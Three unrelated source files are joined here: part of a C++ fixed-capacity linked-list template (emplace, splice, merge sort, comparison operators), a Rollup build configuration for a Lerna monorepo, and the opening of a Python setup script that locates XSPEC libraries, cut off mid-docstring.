/// Emplaces a value to the back of the list..
//*************************************************************************
  // Each emplace_back overload mirrors emplace_front: allocate a raw node,
  // placement-construct the value from the arguments, link before the
  // terminal sentinel (i.e. at the tail).
  template <typename T1>
  void emplace_back(const T1& value1)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1);
    ++construct_count;
    insert_node(terminal_node, *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the back of the list (two constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2>
  void emplace_back(const T1& value1, const T2& value2)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2);
    ++construct_count;
    insert_node(terminal_node, *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the back of the list (three constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3>
  void emplace_back(const T1& value1, const T2& value2, const T3& value3)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3);
    ++construct_count;
    insert_node(terminal_node, *p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value at the back of the list (four constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3, typename T4>
  void emplace_back(const T1& value1, const T2& value2, const T3& value3, const T4& value4)
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!full(), ETL_ERROR(list_full));
#endif
    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3, value4);
    ++construct_count;
    insert_node(terminal_node, *p_data_node);
  }
//*************************************************************************
/// Removes a value from the back of the list.
//*************************************************************************
  /// Removes the last element. Throws etl::list_empty under
  /// ETL_CHECK_PUSH_POP when the list is empty.
  void pop_back()
  {
#if defined(ETL_CHECK_PUSH_POP)
    ETL_ASSERT(!empty(), ETL_ERROR(list_empty));
#endif
    node_t& node = get_tail();
    // remove_node (defined later in the class) unlinks and destroys it.
    remove_node(node);
  }
//*************************************************************************
/// Inserts a value to the list at the specified position.
//*************************************************************************
iterator insert(iterator position, const value_type& value)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
data_node_t& data_node = allocate_data_node(value);
insert_node(*position.p_node, data_node);
return iterator(data_node);
}
//*************************************************************************
/// Emplaces a value to the list at the specified position.
//*************************************************************************
  // Each emplace overload allocates a raw node, placement-constructs the
  // value from the arguments, and links it before 'position'.
  // Returns an iterator to the new element.
  template <typename T1>
  iterator emplace(iterator position, const T1& value1)
  {
    ETL_ASSERT(!full(), ETL_ERROR(list_full));

    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1);
    ++construct_count;
    insert_node(*position.p_node, *p_data_node);

    return iterator(*p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value before 'position' (two constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2>
  iterator emplace(iterator position, const T1& value1, const T2& value2)
  {
    ETL_ASSERT(!full(), ETL_ERROR(list_full));

    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2);
    ++construct_count;
    insert_node(*position.p_node, *p_data_node);

    return iterator(*p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value before 'position' (three constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3>
  iterator emplace(iterator position, const T1& value1, const T2& value2, const T3& value3)
  {
    ETL_ASSERT(!full(), ETL_ERROR(list_full));

    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3);
    ++construct_count;
    insert_node(*position.p_node, *p_data_node);

    return iterator(*p_data_node);
  }

  //*************************************************************************
  /// Emplaces a value before 'position' (four constructor arguments).
  //*************************************************************************
  template <typename T1, typename T2, typename T3, typename T4>
  iterator emplace(iterator position, const T1& value1, const T2& value2, const T3& value3, const T4& value4)
  {
    ETL_ASSERT(!full(), ETL_ERROR(list_full));

    data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
    ::new (&(p_data_node->value)) T(value1, value2, value3, value4);
    ++construct_count;
    insert_node(*position.p_node, *p_data_node);

    return iterator(*p_data_node);
  }
//*************************************************************************
/// Inserts 'n' copies of a value to the list at the specified position.
//*************************************************************************
void insert(iterator position, size_t n, const value_type& value)
{
for (size_t i = 0; i < n; ++i)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
// Set up the next free node and insert.
insert_node(*position.p_node, allocate_data_node(value));
}
}
//*************************************************************************
/// Inserts a range of values to the list at the specified position.
//*************************************************************************
template <typename TIterator>
void insert(iterator position, TIterator first, TIterator last)
{
while (first != last)
{
ETL_ASSERT(!full(), ETL_ERROR(list_full));
// Set up the next free node and insert.
insert_node(*position.p_node, allocate_data_node(*first++));
}
}
//*************************************************************************
/// Erases the value at the specified position.
//*************************************************************************
iterator erase(iterator position)
{
++position;
remove_node(*position.p_node->previous);
return position;
}
//*************************************************************************
/// Erases a range of elements.
//*************************************************************************
  /// Erases the range [first, last).
  ///\return 'last'.
  iterator erase(iterator first, iterator last)
  {
    node_t* p_first = first.p_node;
    node_t* p_last  = last.p_node;
    node_t* p_next;

    // Join the ends first, so the list is valid before any node is destroyed.
    join(*(p_first->previous), *p_last);

    // Erase the ones in between.
    while (p_first != p_last)
    {
      p_next = p_first->next;                                // Remember the next node.
      destroy_data_node(static_cast<data_node_t&>(*p_first)); // Destroy the current node.
      p_first = p_next;                                      // Move to the next node.
    }

    return last;
  }
//*************************************************************************
/// Resizes the list.
/// New elements, if any, are copies of a default-constructed T.
//*************************************************************************
void resize(size_t n)
{
  resize(n, T());
}
//*************************************************************************
/// Resizes the list.
//*************************************************************************
void resize(size_t n, parameter_t value)
{
ETL_ASSERT(n <= MAX_SIZE, ETL_ERROR(list_full));
// Smaller?
if (n < size())
{
iterator i_start = end();
std::advance(i_start, -difference_type(size() - n));
erase(i_start, end());
}
// Larger?
else if (n > size())
{
insert(end(), n - size(), value);
}
}
//*************************************************************************
/// Clears the list.
/// Destroys all elements and returns their nodes to the pool.
//*************************************************************************
void clear()
{
  initialise();
}
//*************************************************************************
// Removes the values specified.
//*************************************************************************
void remove(const value_type& value)
{
iterator iValue = begin();
while (iValue != end())
{
if (value == *iValue)
{
iValue = erase(iValue);
}
else
{
++iValue;
}
}
}
//*************************************************************************
/// Removes according to a predicate.
//*************************************************************************
template <typename TPredicate>
void remove_if(TPredicate predicate)
{
iterator iValue = begin();
while (iValue != end())
{
if (predicate(*iValue))
{
iValue = erase(iValue);
}
else
{
++iValue;
}
}
}
//*************************************************************************
/// Removes all but the first element from every consecutive group of equal
/// elements in the container.
/// Uses std::equal_to as the equality predicate.
//*************************************************************************
void unique()
{
  unique(std::equal_to<T>());
}
//*************************************************************************
/// Removes all but the first element from every consecutive group of equal
/// elements in the container.
///\param isEqual Binary predicate defining element equality.
//*************************************************************************
template <typename TIsEqual>
void unique(TIsEqual isEqual)
{
  if (empty())
  {
    return;
  }

  // Walk the list with a trailing 'previous' iterator, erasing any
  // element equal to its predecessor.
  iterator i_item = begin();
  ++i_item;
  iterator i_previous = begin();

  while (i_item != end())
  {
    if (isEqual(*i_previous, *i_item))
    {
      // Duplicate: erase it; 'previous' stays where it is.
      i_item = erase(i_item);
    }
    else
    {
      // New value: advance both iterators.
      i_previous = i_item;
      ++i_item;
    }
  }
}
//*************************************************************************
/// Splices from another list to this.
/// Note: the elements are copied into this list's pool and then erased
/// from 'other', not relinked, since each list owns its own node pool.
/// Splicing a list onto itself is a no-op.
//*************************************************************************
void splice(iterator to, ilist& other)
{
  if (&other != this)
  {
    insert(to, other.begin(), other.end());
    other.erase(other.begin(), other.end());
  }
}
//*************************************************************************
/// Splices an element from another list to this.
/// Within the same list the node is relinked; from a different list the
/// element is copied into this list's pool and erased from 'other'.
//*************************************************************************
void splice(iterator to, ilist& other, iterator from)
{
  if (&other == this)
  {
    // Internal move.
    move(to, from);
  }
  else
  {
    // From another list.
    insert(to, *from);
    other.erase(from);
  }
}
//*************************************************************************
/// Splices a range of elements from another list to this.
/// Within the same list the range [first, last) is relinked; from a
/// different list it is copied into this list and erased from 'other'.
//*************************************************************************
void splice(iterator to, ilist& other, iterator first, iterator last)
{
  if (&other == this)
  {
    // Internal move.
    move(to, first, last);
  }
  else
  {
    // From another list.
    insert(to, first, last);
    other.erase(first, last);
  }
}
//*************************************************************************
/// Merge another list into this one. Both lists should be sorted.
/// Uses std::less as the comparison predicate.
//*************************************************************************
void merge(ilist& other)
{
  merge(other, std::less<value_type>());
}
//*************************************************************************
/// Merge another list into this one. Both lists should be sorted.
/// Note: the elements are copied into this list (this list must have
/// capacity for them) and 'other' is cleared afterwards, rather than
/// nodes being relinked, since each list owns its own node pool.
///\param compare Strict weak ordering both lists are sorted by.
//*************************************************************************
template <typename TCompare>
void merge(ilist& other, TCompare compare)
{
  if (!other.empty())
  {
#if defined(ETL_DEBUG)
    // In debug builds verify the sortedness precondition.
    ETL_ASSERT(etl::is_sorted(other.begin(), other.end(), compare), ETL_ERROR(list_unsorted));
    ETL_ASSERT(etl::is_sorted(begin(), end(), compare), ETL_ERROR(list_unsorted));
#endif

    ilist::iterator other_begin = other.begin();
    ilist::iterator other_end = other.end();
    ilist::iterator this_begin = begin();
    ilist::iterator this_end = end();

    while ((this_begin != this_end) && (other_begin != other_end))
    {
      // Find the place to insert.
      while ((this_begin != this_end) && !(compare(*other_begin, *this_begin)))
      {
        ++this_begin;
      }

      // Insert every 'other' element that belongs before this position.
      if (this_begin != this_end)
      {
        while ((other_begin != other_end) && (compare(*other_begin, *this_begin)))
        {
          insert(this_begin, *other_begin);
          ++other_begin;
        }
      }
    }

    // Any left over? Append the remaining tail of 'other'.
    if ((this_begin == this_end) && (other_begin != other_end))
    {
      insert(this_end, other_begin, other_end);
    }

    other.clear();
  }
}
//*************************************************************************
/// Sort using in-place merge sort algorithm.
/// Uses 'less-than' operator as the predicate.
//*************************************************************************
void sort()
{
  sort(std::less<T>());
}
//*************************************************************************
/// Sort using in-place merge sort algorithm (bottom-up, relinking nodes
/// rather than copying values). Stable: on ties the left element is
/// taken first (see the !compare branch below).
/// Uses a supplied predicate function or functor.
/// This is not my algorithm. I got it off the web somewhere.
//*************************************************************************
template <typename TCompare>
void sort(TCompare compare)
{
  iterator i_left;
  iterator i_right;
  iterator i_node;
  iterator i_head;
  iterator i_tail;
  int list_size = 1;
  int number_of_merges;
  int left_size;
  int right_size;

  if (is_trivial_list())
  {
    return;
  }

  // Repeatedly merge adjacent runs of length 'list_size', doubling the
  // run length each pass until a pass performs at most one merge.
  while (true)
  {
    i_left = begin();
    i_head = end();
    i_tail = end();

    number_of_merges = 0; // Count the number of merges we do in this pass.

    while (i_left != end())
    {
      ++number_of_merges; // There exists a merge to be done.
      i_right = i_left;
      left_size = 0;

      // Step 'list_size' places along from left
      for (int i = 0; i < list_size; ++i)
      {
        ++left_size;
        ++i_right;

        if (i_right == end())
        {
          break;
        }
      }

      // If right hasn't fallen off end, we have two lists to merge.
      right_size = list_size;

      // Now we have two lists. Merge them.
      while (left_size > 0 || (right_size > 0 && i_right != end()))
      {
        // Decide whether the next node of merge comes from left or right.
        if (left_size == 0)
        {
          // Left is empty. The node must come from right.
          i_node = i_right++;
          --right_size;
        }
        else if (right_size == 0 || i_right == end())
        {
          // Right is empty. The node must come from left.
          i_node = i_left++;
          --left_size;
        }
        else if (!compare(*i_right, *i_left))
        {
          // First node of left is lower or same. The node must come from left.
          i_node = i_left++;
          --left_size;
        }
        else
        {
          // First node of right is lower. The node must come from right.
          i_node = i_right;
          ++i_right;
          --right_size;
        }

        // Add the next node to the merged head.
        if (i_head == end())
        {
          // First node of this pass: link it straight after the terminal node.
          join(*i_head.p_node, *i_node.p_node);
          i_head = i_node;
          i_tail = i_node;
        }
        else
        {
          join(*i_tail.p_node, *i_node.p_node);
          i_tail = i_node;
        }

        // Keep the list well-formed by closing it back to the terminal node.
        join(*i_tail.p_node, terminal_node);
      }

      // Now left has stepped `list_size' places along, and right has too.
      i_left = i_right;
    }

    // If we have done only one merge, we're finished.
    if (number_of_merges <= 1) // Allow for number_of_merges == 0, the empty head case
    {
      return;
    }

    // Otherwise repeat, merging lists twice the size
    list_size *= 2;
  }
}
//*************************************************************************
/// Assignment operator.
/// Replaces this list's contents with a copy of 'rhs'.
//*************************************************************************
ilist& operator = (const ilist& rhs)
{
  // Self-assignment is a no-op.
  if (this == &rhs)
  {
    return *this;
  }

  assign(rhs.cbegin(), rhs.cend());
  return *this;
}
protected:

//*************************************************************************
/// Constructor.
///\param node_pool The pool this list allocates its data nodes from.
///\param max_size_ The maximum number of elements the list may hold.
//*************************************************************************
ilist(etl::ipool& node_pool, size_t max_size_)
  : list_base(node_pool, max_size_)
{
}
//*************************************************************************
/// Initialise the list.
//*************************************************************************
void initialise()
{
if (!empty())
{
if ETL_IF_CONSTEXPR(etl::is_trivially_destructible<T>::value)
{
p_node_pool->release_all();
construct_count.clear();
}
else
{
node_t* p_first = terminal_node.next;
node_t* p_last = &terminal_node;
while (p_first != p_last)
{
destroy_data_node(static_cast<data_node_t&>(*p_first)); // Destroy the current node.
p_first = p_first->next; // Move to the next node.
}
}
}
join(terminal_node, terminal_node);
}
private:

//*************************************************************************
/// Moves an element from one position to another within the list.
/// Moves the element at position 'from' to the position before 'to'.
//*************************************************************************
void move(iterator to, iterator from)
{
  if (from == to)
  {
    return; // Can't move to before yourself!
  }

  node_t& from_node = *from.p_node;
  node_t& to_node = *to.p_node;

  // Disconnect the node from the list.
  join(*from_node.previous, *from_node.next);

  // Attach it to the new position.
  join(*to_node.previous, from_node);
  join(from_node, to_node);
}
//*************************************************************************
/// Moves a range from one position to another within the list.
/// Moves a range at position 'first'/'last' to the position before 'to'.
/// NOTE(review): an empty range (first == last) is not guarded against
/// here — callers appear to pass non-empty ranges; confirm before reuse.
//*************************************************************************
void move(iterator to, iterator first, iterator last)
{
  if ((first == to) || (last == to))
  {
    return; // Can't move to before yourself!
  }

#if defined(ETL_DEBUG)
  // Check that we are not doing an illegal move!
  for (const_iterator item = first; item != last; ++item)
  {
    ETL_ASSERT(item != to, ETL_ERROR(list_iterator));
  }
#endif

  node_t& first_node = *first.p_node;
  node_t& last_node = *last.p_node;
  node_t& to_node = *to.p_node;
  // The last node actually moved is the one before 'last' ([first, last)).
  node_t& final_node = *last_node.previous;

  // Disconnect the range from the list.
  join(*first_node.previous, last_node);

  // Attach it to the new position.
  join(*to_node.previous, first_node);
  join(final_node, to_node);
}
//*************************************************************************
/// Remove a node.
/// Unlinks the node from the list, destroys its value and returns the
/// node to the pool.
//*************************************************************************
void remove_node(node_t& node)
{
  // Disconnect the node from the list.
  join(*node.previous, *node.next);

  // Destroy the pool object.
  destroy_data_node(static_cast<data_node_t&>(node));
}
//*************************************************************************
/// Allocate a data_node_t.
/// Takes a node from the pool, copy-constructs the value in place and
/// bumps the construction count.
//*************************************************************************
data_node_t& allocate_data_node(parameter_t value)
{
  data_node_t* p_data_node = p_node_pool->allocate<data_node_t>();
  ::new (&(p_data_node->value)) T(value); // Placement-construct the value.
  ++construct_count;

  return *p_data_node;
}
//*************************************************************************
/// Destroy a data_node_t.
/// Destroys the stored value, returns the node to the pool and
/// decrements the construction count.
//*************************************************************************
void destroy_data_node(data_node_t& node)
{
  node.value.~T(); // Explicitly destroy the placement-constructed value.
  p_node_pool->release(&node);
  --construct_count;
}
// Disable copy construction (declared, never defined).
ilist(const ilist&);

#if defined(ETL_POLYMORPHIC_LIST) || defined(ETL_POLYMORPHIC_CONTAINERS)
public:

  /// Virtual destructor when polymorphic container behaviour is configured.
  virtual ~ilist()
  {
  }
#else
protected:

  /// Non-virtual, protected destructor: prevents deletion through a
  /// base-class pointer when the list is not configured as polymorphic.
  ~ilist()
  {
  }
#endif
};
//*************************************************************************
/// A templated list implementation that uses a fixed size buffer.
///\tparam T         The element type.
///\tparam MAX_SIZE_ The maximum number of elements the list may hold.
//*************************************************************************
template <typename T, const size_t MAX_SIZE_>
class list : public etl::ilist<T>
{
public:

  static const size_t MAX_SIZE = MAX_SIZE_;

public:

  typedef T        value_type;
  typedef T*       pointer;
  typedef const T* const_pointer;
  typedef T&       reference;
  typedef const T& const_reference;
  typedef size_t   size_type;

  //*************************************************************************
  /// Default constructor.
  //*************************************************************************
  list()
    : etl::ilist<T>(node_pool, MAX_SIZE)
  {
    etl::ilist<T>::initialise();
  }

  //*************************************************************************
  /// Destructor. Destroys all stored elements.
  //*************************************************************************
  ~list()
  {
    etl::ilist<T>::initialise();
  }

  //*************************************************************************
  /// Construct from size. Fills with default-constructed values.
  //*************************************************************************
  explicit list(size_t initial_size)
    : etl::ilist<T>(node_pool, MAX_SIZE)
  {
    etl::ilist<T>::assign(initial_size, T());
  }

  //*************************************************************************
  /// Construct from size and value.
  // Consistency: qualify ilist with etl:: as the rest of this class does.
  //*************************************************************************
  list(size_t initial_size, typename etl::ilist<T>::parameter_t value)
    : etl::ilist<T>(node_pool, MAX_SIZE)
  {
    etl::ilist<T>::assign(initial_size, value);
  }

  //*************************************************************************
  /// Copy constructor.
  //*************************************************************************
  list(const list& other)
    : etl::ilist<T>(node_pool, MAX_SIZE)
  {
    if (this != &other)
    {
      etl::ilist<T>::assign(other.cbegin(), other.cend());
    }
  }

  //*************************************************************************
  /// Construct from range.
  //*************************************************************************
  template <typename TIterator>
  list(TIterator first, TIterator last)
    : etl::ilist<T>(node_pool, MAX_SIZE)
  {
    etl::ilist<T>::assign(first, last);
  }

  //*************************************************************************
  /// Assignment operator.
  //*************************************************************************
  list& operator = (const list& rhs)
  {
    if (&rhs != this)
    {
      etl::ilist<T>::assign(rhs.cbegin(), rhs.cend());
    }

    return *this;
  }

private:

  /// The pool of nodes used in the list.
  etl::pool<typename etl::ilist<T>::data_node_t, MAX_SIZE> node_pool;
};
}
//*************************************************************************
/// Equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the lists are equal, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator ==(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  // Different sizes can never be equal; skip the element comparison.
  if (lhs.size() != rhs.size())
  {
    return false;
  }

  return std::equal(lhs.begin(), lhs.end(), rhs.begin());
}
//*************************************************************************
/// Not equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the lists are not equal, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator !=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  // Defined as the negation of operator ==.
  const bool equal = (lhs == rhs);
  return !equal;
}
//*************************************************************************
/// Less than operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically less than the
/// second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator <(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  return std::lexicographical_compare(lhs.begin(), lhs.end(),
                                      rhs.begin(), rhs.end());
}
//*************************************************************************
/// Greater than operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically greater than the
/// second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator >(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  // a > b is exactly b < a.
  return rhs < lhs;
}
//*************************************************************************
/// Less than or equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically less than or equal
/// to the second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator <=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  // a <= b is exactly !(b < a).
  return !(rhs < lhs);
}
//*************************************************************************
/// Greater than or equal operator.
///\param lhs Reference to the first list.
///\param rhs Reference to the second list.
///\return <b>true</b> if the first list is lexicographically greater than or
/// equal to the second, otherwise <b>false</b>.
//*************************************************************************
template <typename T>
bool operator >=(const etl::ilist<T>& lhs, const etl::ilist<T>& rhs)
{
  // a >= b is exactly !(a < b).
  const bool less = (lhs < rhs);
  return !less;
}
// Re-define the 'min' macro for MSVC builds — presumably restoring a macro
// removed earlier in these headers; confirm against the matching #undef.
#ifdef ETL_COMPILER_MICROSOFT
#define min(a,b) (((a) < (b)) ? (a) : (b))
#endif

#undef ETL_FILE
#endif
|
/** TODO: bundler tricks
* 🔇 shim the console.log on both `bytebeallcore` and `headless-wallet`
*/
import {dirname, resolve, parse} from "path"
import {sync as glob} from "globby"
import {logger} from "@rollup/log"
import {rm, mv} from "shelljs"
import {sync as rmEmptyDir} from "delete-empty"
import nodeResolve from "rollup-plugin-node-resolve"
import json from "rollup-plugin-json"
import typescript from "rollup-plugin-typescript2"
import babel from "rollup-plugin-babel"
// Shared timestamped logger and the Lerna/Rollup environment flags.
const log = logger({timestamp: true})
const {LERNA_PACKAGE_NAME, LERNA_ROOT_PATH, ROLLUP_WATCH} = process.env
// numOutput is set by mapOutput(); count tracks bundles written so far.
let numOutput, count = 0
const lernaInfo = {
name: "lerna-info",
buildStart: input => {
rm("-rf", "dist", ".rpt2_cache", "types")
log.info(`start building ${LERNA_PACKAGE_NAME} 🚧`)
},
generateBundle: output => log.pass(`finish building ${LERNA_PACKAGE_NAME} as ${output.format.toUpperCase()} module 🏁`),
writeBundle: result => {
if (numOutput <= ++count) {
if (!ROLLUP_WATCH) mv("types/*/src/*", "types")
rmEmptyDir("types")
}
},
renderError: error => log.fail(error.message + ' ❌')
}
// Insert (or replace) entries relative to the element equal to `name`:
// at(idx, del) splices `item` in at indexOf(name) + idx, deleting `del`
// entries, then exposes `chain` so callers can keep composing.
const splice = (items, name, ...item) => ({
  at(idx, del = 0) {
    const base = items.indexOf(name)
    items.splice(base + idx, del, ...item)
    return {chain: obj => obj}
  }
})
// #region helper

// package.json of the current package and of the Lerna monorepo root.
export const pkg = require(resolve(process.cwd(), "package.json"))
export const pkgRoot = require(resolve(LERNA_ROOT_PATH, "package.json"))
// Expand an input map into concrete Rollup entry points.
// Keys without '*' pass through unchanged; a key like "lib/*.ts" is split
// on the '*' and each globbed file becomes `${prefix}/${basename}${suffix}`.
export function mapInput(inputs) {
  const result = {}

  for (const key in inputs) {
    if (!key.includes("*")) {
      result[key] = inputs[key]
      continue
    }

    // Glob pattern: expand every matched file into its own entry.
    const [prefix, suffix] = key.split("*")
    for (const file of glob(resolve(process.cwd(), inputs[key]))) {
      result[`${prefix}/${parse(file).name}${suffix}`] = file
    }
  }

  return result
}
// Expand the declared output formats into full Rollup output configs.
// Side effect: records outputs.length in module-level `numOutput`, which
// lernaInfo.writeBundle uses to detect when the last output is written.
export function mapOutput(outputs) {
  numOutput = outputs.length
  return outputs.map(output => {
    // ES modules get .mjs and the directory from pkg.module; everything
    // else gets .js and pkg.main. Assumes both fields exist in
    // package.json — TODO confirm.
    const ext = output.format === "es" ? "mjs" : "js"
    const dist = output.format === "es" ? pkg.module : pkg.main
    // With multiple outputs, nest each format in its own subdirectory.
    const subdir = outputs.length > 1 ? output.format : ''
    return {
      dir: resolve(dirname(dist), subdir),
      // TODO: try https://github.com/rollup/rollup/issues/2336 when merged
      chunkFileNames: `chunks/[name]-[hash].${ext}`,
      entryFileNames: `[name].${ext}`,
      ...output
    }
  })
}
// Fluent editor for a plugin array, e.g.
//   modify(plugins).plug(p).before("name") — insert before the named entry
//   .after("name")     — insert after it
//   .replacing("name") — insert in its slot and delete it
export const modify = plugins => ({
  plug: (...plugin) => ({
    before: name => splice(plugins, name, ...plugin).at(0).chain(modify(plugins)),
    after: name => splice(plugins, name, ...plugin).at(1).chain(modify(plugins)),
    replacing: name => splice(plugins, name, ...plugin).at(0, 1).chain(modify(plugins)),
  })
})
// #endregion helper

// Rollup Configuration
export default {
  watch: {clearScreen: false},
  plugins: [
    lernaInfo,
    json(),
    // Babel only in watch mode (fast rebuilds); a falsy entry is produced
    // otherwise, which Rollup ignores.
    ROLLUP_WATCH && babel({
      root: LERNA_ROOT_PATH,
      cwd: process.cwd(),
      extensions: [".ts"]
    }),
    nodeResolve({extensions: [".ts"]}),
    // Full TypeScript compile (with declaration output) only for real builds.
    !ROLLUP_WATCH && typescript({
      exclude: ["test/**"],
      tsconfig: resolve(LERNA_ROOT_PATH, "tsconfig.json"),
      // cacheRoot: `${require("temp-dir")}/.rpt2_cache`, // enable this if it's difficult to read the packages structure
      tsconfigOverride: {
        compilerOptions: {
          module: "esnext",
          declaration: true,
          declarationDir: `${process.cwd()}/types`
        }
      },
      useTsconfigDeclarationDir: true
    }),
  ],
}
|
#!/usr/bin/env python
from __future__ import print_function
import ctypes.util
import glob
import os
import re
import sys
from distutils.version import LooseVersion
from setuptools import Extension, setup
from setuptools.command.build_ext import build_ext as _build_ext
import versioneer
# This is needed to use numpy in this module, and should work whether or not numpy is
# already installed. If it's not, it will trigger an installation

# Fallback XSPEC version assumed when ASTRO_XSPEC_VERSION is not set.
_default_xspec_version = "12.10.1"
class My_build_ext(_build_ext):
    """build_ext that defers the numpy include-dir lookup until build time.

    numpy is listed in ``setup_requires``, so it may be installed by
    setuptools during this same run; importing it inside
    ``finalize_options`` (rather than at module import time) makes that
    work.
    """

    def finalize_options(self):
        _build_ext.finalize_options(self)

        # Prevent numpy from thinking it is still in its setup process.
        # Use the real `builtins` module: `__builtins__` is a CPython
        # implementation detail and may be a dict rather than a module
        # when this file is imported instead of run as __main__.
        import builtins
        builtins.__NUMPY_SETUP__ = False

        import numpy
        self.include_dirs.append(numpy.get_include())
        self.include_dirs.append('astromodels/xspec/include')
def sanitize_lib_name(library_path):
    """Return the linker name for a library file.

    Gets a fully-qualified library name, like ``/usr/lib/libgfortran.so.3.0``,
    and returns the lib name needed to be passed to the linker in the ``-l``
    option (for example ``gfortran``).

    :param library_path: path (or bare filename) of the library
    :return: the library name without the ``lib`` prefix or extension
    :raises RuntimeError: if the filename does not look like a library
    """

    lib_name = os.path.basename(library_path)

    # Some regexp magic needed to extract in a system-independent (mac/linux)
    # way the library name. Raw string: "\." in a plain string literal is an
    # invalid escape (SyntaxWarning on modern Pythons).
    tokens = re.findall(r"lib(.+)(\.so|\.dylib|\.a)(.+)?", lib_name)

    if not tokens:
        raise RuntimeError('Attempting to find %s in directory %s but there are no libraries in this directory'%(lib_name,library_path))

    return tokens[0][0]
def find_library(library_root, additional_places=None):
    """Locate a shared library and return its linker name.

    :param library_root: root of the library to search, for example "cfitsio_" will match libcfitsio_1.2.3.4.so
    :param additional_places: optional list of extra directories to search
    :return: the name of the library found (NOTE: this is *not* the path), and a directory path if the library is not
        in the system paths (and None otherwise). The name of libcfitsio_1.2.3.4.so will be cfitsio_1.2.3.4, in other
        words, it will be what is needed to be passed to the linker during a c/c++ compilation, in the -l option
    :raises NotImplementedError: on platforms other than Linux and macOS
    """

    # ctypes.util.find_library searches all system paths in a system-independent
    # way (but NOT those defined in LD_LIBRARY_PATH or DYLD_LIBRARY_PATH)
    first_guess = ctypes.util.find_library(library_root)

    if first_guess is not None:
        # Found in one of the system paths
        if sys.platform.lower().find("linux") >= 0:
            # On linux the linker already knows about these paths, so we
            # can return None as path
            return sanitize_lib_name(first_guess), None

        elif sys.platform.lower().find("darwin") >= 0:
            # On Mac we still need to return the path, because the linker sometimes
            # does not look into it
            return sanitize_lib_name(first_guess), os.path.dirname(first_guess)

        else:
            # Windows is not supported
            raise NotImplementedError("Platform %s is not supported" % sys.platform)

    else:
        # Could not find it. Let's examine LD_LIBRARY_PATH or DYLD_LIBRARY_PATH.
        # (If they are not defined, possible_locations becomes [""], which is
        # handled by the loop below.)
        if sys.platform.lower().find("linux") >= 0:
            # Unix / linux
            possible_locations = os.environ.get("LD_LIBRARY_PATH", "").split(":")

        elif sys.platform.lower().find("darwin") >= 0:
            # Mac
            possible_locations = os.environ.get("DYLD_LIBRARY_PATH", "").split(":")

        else:
            raise NotImplementedError("Platform %s is not supported" % sys.platform)

        if additional_places is not None:
            possible_locations.extend(additional_places)

        # Now look into the search paths
        library_name = None
        library_dir = None

        for search_path in possible_locations:
            if search_path == "":
                # This can happen if there is more than one ':' in the variable, or if
                # neither LD_LIBRARY_PATH nor DYLD_LIBRARY_PATH is defined (because of
                # the "" default used above with os.environ.get)
                continue

            results = glob.glob(os.path.join(search_path, "lib%s*" % library_root))

            if len(results) >= 1:
                # Results contain things like libXS.so, libXSPlot.so, libXSpippo.so.
                # If we are looking for libXS.so we need to make sure we get the right
                # one, so require a separator character right after the root name.
                # re.escape guards against regex metacharacters in the root name and
                # the raw string avoids invalid-escape warnings.
                for result in results:
                    if re.match(r"lib%s[-_.]" % re.escape(library_root), os.path.basename(result)) is None:
                        continue
                    else:
                        # FOUND IT
                        # This is the full path of the library, like /usr/lib/libcfitsio_1.2.3.4
                        library_name = result
                        library_dir = search_path
                        break

            if library_name is not None:
                break

        if library_name is None:
            return None, None
        else:
            # Sanitize the library name to get from the fully-qualified path to just
            # the library name (/usr/lib/libgfortran.so.3.0 becomes gfortran)
            return sanitize_lib_name(library_name), library_dir
def setup_xspec():
    """Configure the Xspec extension module, if Xspec is available.

    Looks for the Xspec libraries via the HEADAS environment variable or,
    failing that, inside a Conda environment (CONDA_PREFIX, or PREFIX when
    run as a Conda build).

    :return: a one-element list with the configured ``Extension``, or None
        when Xspec support cannot be built.
